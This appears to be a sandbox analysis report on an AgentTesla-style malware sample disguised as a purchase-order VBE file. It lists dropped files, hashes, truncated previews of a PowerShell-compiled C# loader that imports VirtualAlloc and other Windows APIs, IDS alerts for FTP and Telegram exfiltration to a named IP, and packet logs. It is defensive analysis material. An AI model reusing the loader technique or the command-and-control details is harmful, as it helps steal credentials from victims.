                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1075), with no line terminators
                              Category:dropped
                              Size (bytes):1078
                              Entropy (8bit):4.940853242499253
                              Encrypted:false
                              SSDEEP:24:JVSRTQ1BI7kKMy6k1Ahr0n8rsvJmsIpLnH:JV6TIBAXyuM08rsvJmsCLnH
                              MD5:D697E139982C89FE5B0FD2410BE24D8A
                              SHA1:A4436350800275EAB95B8C9FFF79C1A5AA3D5783
                              SHA-256:7665F657D3972656C1ACBD5C46C4E1886F2CB8B427C0996BC78A34DCCF00C459
                              SHA-512:8E1E55545B9B893D28FDF82C9A5122F35531CB3AB35A5C9CBA05FC52227BCD4F69513C07EE8EA2DEB02BC9F059116103228A9F7A480BEADA2FD153F937E3A726
                              Malicious:false
                              Preview:.using System;using System.Runtime.InteropServices;public static class Methyl1 {[DllImport("kernel32")]public static extern int GetThreadTimes(int Progr82,int Fremad,int Tele,int Tredi,int Tim);[DllImport("user32")]public static extern int ClientToScreen(int Inkorp,int tekno);[DllImport("kernel32")]public static extern int ExpandEnvironmentStrings(int Rotte,int Bul,int Ento);[DllImport("user32")]public static extern int EnumChildWindows(int Lithed,int Diobo,int Alung);[DllImport("winmm.dll")]public static extern int joySetCapture(int Kodif,int Vej,int Empti,int Reacti);[DllImport("kernel32")]public static extern void GlobalMemoryStatus(int Anlgsi);[DllImport("kernel32")]public static extern int IsValidCodePage(int Gaum);[DllImport("kernel32")]public static extern int HeapReAlloc(int Hand,int Fals,int Hung,int Under);[DllImport("gdi32")]public static extern int CreateSolidBrush(int For);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImpor

                              C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                              Category:dropped
                              Size (bytes):371
                              Entropy (8bit):5.211213369657342
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23ftVbBH0zxs7+AEszICN23ftVbDH:p37Lvkmb6KmDaWZE7DPH
                              MD5:4D7761BC538C78315CB0B7D49537A004
                              SHA1:8F0E7A3303C282F2B1859F63EB37BFE801B35B7C
                              SHA-256:8422ADE6961B4092DDA6D9EF5C6AC15F621CB0803D19AB8197A5DA777928FC18
                              SHA-512:DAB197A4D3289F2996403152E6D60658473BB3611F050851050381A26A77AB477B09C5AA99E2C4440ABA54EB015B16C758C5DA91A228B5BD12AFDD948955DC26
                              Malicious:true
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"

                              C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.052799017232693
                              Encrypted:false
                              SSDEEP:24:etGShEoL4q2fP+8cX7uAwOCTO7Ax+ilZZXaIXedLo1TtkF/K4NmWI+ycuZhN/nam:6hXpwPNYcYLIZT+1F/K61ul/na3Goq
                              MD5:140A93F45C268888BF601F03CA80BB29
                              SHA1:A52983EFA9A949F18AAECE009A03325E63C4430B
                              SHA-256:14B4DF06BE100518F7749895EE293E3E5BDD8156DF81166CAB0B9600743B565E
                              SHA-512:9D589B9F809D0F07530DA0B6F9EC1F4DBE55EF36F7E1CAFA33D949E70316245BC17EAEABCF7E564093F88A89BE00C4856A8D4F4F161C0C2654BCBBC202DB8C6F
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.0.......#GUID...@...p...#Blob...........G.........%3............................................................/.(...................................................... 6............ E............ T............ m............ ~. .......... ..(.......... ..-.......... .. .......... ..-.......... .. .......... ..2...................

                              C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.out

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):866
                              Entropy (8bit):5.303224718050824
                              Encrypted:false
                              SSDEEP:24:Aqd3ka6KmD7E7DPOKax5DqBVKVrdFAMBJTH:Aika6PnE7qK2DcVKdBJj
                              MD5:551FF17659DB1C1CA656A1F4C542C140
                              SHA1:1E5F30CB2A4C2E238AB6903A0EAB87219D3EE125
                              SHA-256:001FACBC1F52BE24790C07EB1AAFD087CBB9395871F486C1DDE62B22CF2C71D0
                              SHA-512:BA9EDEF5F25DF7066AC9CE71F7FC1910B5C02978708C72E9DCCDC82AC6C0E274D0CF5DA9B42E54D49593508FB5CC5F8FF856BEF7FB8E0BE1993EF259F41E38D0
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                              C:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.087847912769416
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqgIYak7YnqqxgINPN5Dlq5J:+RI+ycuZhN/nakSGwPNnqX
                              MD5:34955465138EB2BC53DC0D26D39005E8
                              SHA1:200065A3FB120DB014BB5FBB910EAAF74060C879
                              SHA-256:CD95882F97D1A9AFF3A338D8AC93C25ABFB81237A4A0B316B3556908B9A58822
                              SHA-512:732124C01B2B5F3716020DAE3BFB814B9F0575AEDA82BED745AD9A18F57A9676846974938B35DB07A9EB6B8826A1D91E70AEEFEFCAE608B66D0F27CFD8F6B8FF
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                              C:\Users\user\AppData\Local\Temp\RES6FA6.tmp

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 28 18:13:31 2022, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1328
                              Entropy (8bit):3.9874853720027996
                              Encrypted:false
                              SSDEEP:24:HMe9E2vpIlKcq9dHvAFwKPfwI+ycuZhN/nakSGwPNnqSqd:HO1q3xKPo1ul/na3GoqSK
                              MD5:3C6943A93469F3893ADFC0D016FE02A8
                              SHA1:74F78D59A92AE02CDED002086A1C361761C99C92
                              SHA-256:1823732D123E9C67B5733D7BB0FB0A20BF8636ED9F70A89D2DEEEBEABF468A38
                              SHA-512:6E614BB0D63C0FDBF8B837DCE5807FD1263753912535A4090A39AA427ACACA4FC180682DC572060A2B21ECC28B5250B6D81F3897C376816F98F118A938D06B06
                              Malicious:false
                              Preview:L...K..c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP...............4.Te....S..&.............5.......C:\Users\user\AppData\Local\Temp\RES6FA6.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3npi4ip.vsh.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zft31ohr.hmb.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              \Device\ConDrv

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):3.964735178725505
                              Encrypted:false
                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                              MD5:9F754B47B351EF0FC32527B541420595
                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                              Malicious:false
                              Preview:NordVPN directory not found!..

                              Static File Info

                              General

                              File type:ASCII text, with CRLF line terminators
                              Entropy (8bit):5.855492842209971
                              TrID:
                                File name:PO-08784 xlsx.vbe
                                File size:352659
                                MD5:266115592f966240c14dfeeec624bdf5
                                SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
                                SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
                                SHA512:951e630a3faca243913ef3955fda178356ab1fbab1dc236c9ef6db096fc1c48b517bcce5b9964f72de213787aca6f9acdeb71fe669119f435088e2c9dcb47e7e
                                SSDEEP:6144:JRYNxYchRj8pwdtWU4QfN+jWR4MvMsLYstdy2BxV72Q8qE+dRLzHb4HZIKK:jwhRjNtWU4vWRDvtEIy0xV7tNnRW6KK
                                TLSH:D874AEB1993126244D0F130BAB861AC48CE937E71513232D5DABF78D2633F4F926E6D9
                                File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl

                                File Icon

                                Icon Hash:e8d69ece869a9ec4

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.11.20185.31.121.13649807212029927 11/28/22-18:14:18.239839TCP2029927ET TROJAN AgentTesla Exfil via FTP4980721192.168.11.20185.31.121.136
                                192.168.11.20185.31.121.13649808564112851779 11/28/22-18:14:18.274476TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4980856411192.168.11.20185.31.121.136

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 28, 2022 18:14:03.133449078 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.247994900 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.248229027 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.248883963 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.363363981 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371316910 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371407032 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371470928 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371532917 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371570110 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371597052 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371643066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371643066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371663094 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371726990 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371767998 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371767998 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371789932 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371835947 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371854067 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371920109 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371956110 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.372128963 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486287117 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486327887 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486346960 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486371994 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486390114 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486406088 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486506939 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486511946 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486512899 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486512899 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486515999 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486542940 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486560106 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486576080 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486587048 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486603975 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486684084 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486687899 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486689091 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486690044 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486706018 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486706018 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486733913 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486809969 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486810923 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486840010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486840010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486920118 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.487032890 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602055073 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602243900 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602268934 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602340937 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602463961 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602469921 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602519989 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602653027 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602660894 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602732897 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602791071 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602860928 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602897882 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602899075 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602914095 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.602957964 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.602967978 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603020906 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603055954 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603055954 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603074074 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603115082 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603127003 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603180885 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603230000 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603234053 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603230000 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603287935 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603290081 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603341103 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603387117 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603387117 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603394985 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603445053 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603449106 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603502035 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603554964 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603554010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603554010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603606939 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603611946 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603660107 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603708982 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603714943 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603708982 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603770018 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603770971 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603825092 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603878021 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603878021 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603878021 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603929043 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.603935957 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.603984118 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604036093 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604037046 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604037046 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604089022 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604094982 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604141951 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604195118 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604202032 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604202032 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604247093 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604279995 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604279995 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604300022 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604403973 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604427099 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604427099 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604460001 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604487896 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604513884 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604568958 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604623079 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.604624033 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604624987 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604682922 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604762077 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.604835987 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719151974 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719235897 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719434023 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719434023 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719494104 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719600916 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719654083 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719707966 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719727039 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719808102 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719820976 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719877005 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719924927 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.719929934 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719984055 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.719991922 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720103979 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720103979 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720187902 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720246077 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720264912 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720340967 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720376968 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720393896 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720438004 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720491886 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720545053 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720583916 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720628977 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720665932 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720722914 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720777035 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720829010 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720869064 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720869064 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720882893 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720927954 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.720937014 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.720989943 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721035957 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721035957 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721043110 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721096992 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721149921 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721203089 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721199989 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721199989 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721256971 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721260071 CET4980380192.168.11.20192.185.145.188
